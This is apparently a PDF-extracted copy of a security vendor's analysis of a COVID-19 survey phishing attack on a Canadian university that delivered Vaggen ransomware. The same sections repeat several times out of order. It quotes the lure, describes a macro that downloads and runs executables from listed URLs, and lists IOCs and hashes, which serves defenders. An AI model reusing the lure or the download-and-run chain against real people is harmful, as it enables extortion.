3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1992 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1993 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1994 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1995 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1996 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1997 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1998 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1999 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2000 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2001 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2002 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2003 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2004 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2005 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2006 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2007 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2008 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2009 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2010 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2011 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2012 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2013 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2014 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2015 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2016 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2017 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2018 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2019 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2020 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2021 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2022 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2023 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2024 of 